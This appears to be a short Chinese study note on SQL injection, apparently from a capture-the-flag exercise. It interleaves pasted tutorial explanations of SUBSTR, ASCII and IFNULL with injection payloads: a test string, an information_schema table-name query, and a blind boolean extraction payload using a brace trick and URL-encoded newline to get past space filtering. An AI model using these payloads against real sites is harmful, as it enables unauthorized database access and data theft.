判断存在注入
a=b||'查询表名
select{x table_name}from `information_schema`.tables where table_schema=database#
()
SQL 中的 substring 函数是用来抓出一个栏位资料中的其中一部分。这个函数的名称在不同的资料库中不完全一样:
- MySQL: SUBSTR( ), SUBSTRING( )
- Oracle: SUBSTR( )
- SQL Server: SUBSTRING( )
最常用到的方式如下 (在这里我们用 SUBSTR( ) 为例):
SUBSTR (str, pos)
SQL语言的 ASCII 函数显示字符串第一个字符的 ascii 值。我们还可以将 ASCII 函数与 SQL 表的字符串字段一起使用。
语法1:此语法使用带有 SQL 表列名的 ASCII 函数:
SELECT ASCII (Column_Name) AS Alias_Name FROM Table_Name; 在语法中,我们必须指定要在其上使用 ASCII 字符串函数的列名。
语法2:此语法使用带有字符集(字符串)的 ASCII 函数:
SELECT ASCII (String); IFNULL() 函数用于判断第一个表达式是否为 NULL,如果为 NULL 则返回第二个参数的值,如果不为 NULL 则返回第一个参数的值。
IFNULL() 函数语法格式为:
IFNULL(expression, alt_value)表名
a=b''&&IFNULL(ascii(substring((select{x table_name}from `information_schema`.tables where table_schema=database#
() limit 0,1),1,1))>1,'f')||'URLEncode编码+空格绕过%0a
